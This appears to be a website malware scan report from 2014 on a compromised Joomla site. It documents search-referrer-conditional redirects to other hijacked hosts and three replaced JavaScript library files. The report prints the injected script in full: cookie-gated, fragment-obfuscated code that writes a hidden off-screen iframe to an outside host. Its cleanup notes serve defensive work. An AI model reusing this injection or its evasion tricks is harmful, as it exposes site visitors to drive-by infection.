Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=isp-m.ru
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
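Malicious/Suspicious Redirects (both requests below carried a search-engine Referer; the same root URL is listed with 200 OK and "clean" under "Scanned pages/files", so the redirect appears to be conditional on the request - when verifying a cleanup, test with and without a search-engine Referer)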
Request | Server response | Status |
URL: http://isp-m.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: isp-m.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 24 Sep 2014 01:31:24 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx/1.6.0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.10 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 24 Sep 2014 01:31:24 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
Scanned pages/files
Request | Server response | Status |
http://isp-m.ru/ | 200 OK Content-Length: 28168 Content-Type: text/html | clean |
http://isp-m.ru/media/system/js/core.js | 200 OK Content-Length: 6295 Content-Type: application/x-javascript | clean |
http://isp-m.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 2043 Content-Type: application/x-javascript | malicious |
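Malicious code - confirmed by antiviruses (see below). Note: the listing is cut off inside the user-agent list (after 'Chrom), so the body of funcionUA and the getCookie/setCookie helpers are not shown. What is visible: when funcionUA() returns false and the cookie 'uefaye18fjeo328rf7ajhe' is unset, the script sets that cookie and then uses document.write to emit an off-screen iframe (left/top -1284px) whose tag is assembled from short string fragments, so a plain-text search of the file for "<iframe" will not match; search for the cookie name or for document.write with concatenated fragments instead. Because the cookie is set before the write, a repeat load in the same browser profile will presumably not show the injection, so re-check from a clean profile. The 2043-byte Content-Length is far smaller than a normal mootools-core.js, which suggests the library file was replaced rather than appended to; restore it from a known-good copy. (function(){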
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrom } if (!funcionUA()) { var cookie = getCookie('uefaye18fjeo328rf7ajhe'); if (cookie == undefined) { setCookie('uefaye18fjeo328rf7ajhe', true, 172803); document.write('<'+'i'+'fr'+'a'+'m'+'e name="Fulebraga" s'+'rc'+'='+'"http://granate.healthcaters.com/hredgtewgdgrehreh19.html" style="position:absolute;left:'+'-'+'1284'+'px;t'+'op:'+'-'+'1284'+'px;" height="134" width="134">'+'<'+'/'+'i'+'f'+'ra'+'m'+'e>'); } }; })(); Decoded script: <iframe name="Fulebraga" src="http://granate.healthcaters.com/hredgtewgdgrehreh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
http://isp-m.ru/media/system/js/caption.js | 200 OK Content-Length: 2870 Content-Type: application/x-javascript | clean |
http://isp-m.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 2043 Content-Type: application/x-javascript | malicious |
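Malicious code - confirmed by antiviruses (see below). Note: the snippet is truncated inside the user-agent list; the visible part gates on funcionUA() and on the cookie 'uefaye18fjeo328rf7ajhe', then writes a hidden off-screen iframe whose tag is built from string fragments, so a plain search for "<iframe" will not find it. The 2043-byte Content-Length is implausibly small for jquery.js, which suggests the file was replaced rather than appended to; restore it from a known-good copy. (function(){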
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrom } if (!funcionUA()) { var cookie = getCookie('uefaye18fjeo328rf7ajhe'); if (cookie == undefined) { setCookie('uefaye18fjeo328rf7ajhe', true, 172803); document.write('<'+'i'+'fr'+'a'+'m'+'e name="Fulebraga" s'+'rc'+'='+'"http://granate.healthcaters.com/hredgtewgdgrehreh19.html" style="position:absolute;left:'+'-'+'1284'+'px;t'+'op:'+'-'+'1284'+'px;" height="134" width="134">'+'<'+'/'+'i'+'f'+'ra'+'m'+'e>'); } }; })(); Decoded script: <iframe name="Fulebraga" src="http://granate.healthcaters.com/hredgtewgdgrehreh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
http://isp-m.ru/cache/widgetkit/widgetkit-1a3c4ef4.js | 200 OK Content-Length: 16725 Content-Type: application/x-javascript | clean |
http://isp-m.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 2048 Content-Type: application/x-javascript | malicious |
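Malicious code - confirmed by antiviruses (see below). Note: the snippet is truncated inside the user-agent list; the visible part gates on funcionUA() and on the cookie 'uefaye18fjeo328rf7ajhe', then writes a hidden off-screen iframe whose tag is built from string fragments, so a plain search for "<iframe" will not find it. The 2048-byte Content-Length is implausibly small for mootools-more.js, which suggests the file was replaced rather than appended to; restore it from a known-good copy. (function(){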
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrom } if (!funcionUA()) { var cookie = getCookie('uefaye18fjeo328rf7ajhe'); if (cookie == undefined) { setCookie('uefaye18fjeo328rf7ajhe', true, 172803); document.write('<'+'i'+'fr'+'a'+'m'+'e name="Fulebraga" s'+'rc'+'='+'"http://granate.healthcaters.com/hredgtewgdgrehreh19.html" style="position:absolute;left:'+'-'+'1284'+'px;t'+'op:'+'-'+'1284'+'px;" height="134" width="134">'+'<'+'/'+'i'+'f'+'ra'+'m'+'e>'); } }; })(); Decoded script: <iframe name="Fulebraga" src="http://granate.healthcaters.com/hredgtewgdgrehreh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
http://isp-m.ru/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 23871 Content-Type: application/x-javascript | clean |
http://isp-m.ru/plugins/system/rokbox/themes/mynxx/rokbox-config.js | 200 OK Content-Length: 2599 Content-Type: application/x-javascript | clean |
http://isp-m.ru/templates/beez5/javascript/md_stylechanger.js | 200 OK Content-Length: 4174 Content-Type: application/x-javascript | clean |
http://isp-m.ru/modules/mod_swmenufree/transmenu_Packed.js | 200 OK Content-Length: 19640 Content-Type: application/x-javascript | clean |
http://isp-m.ru/templates/beez5/javascript/hide.js | 200 OK Content-Length: 9805 Content-Type: application/x-javascript | clean |
http://isp-m.ru/index.php/nashi-uslugi/stroitelstvo | 200 OK Content-Length: 26769 Content-Type: text/html | clean |
http://isp-m.ru/index.php/nashi-uslugi/ | 200 OK Content-Length: 26545 Content-Type: text/html | clean |
http://isp-m.ru/index.php/nashi-uslugi/energetika | 200 OK Content-Length: 34086 Content-Type: text/html | clean |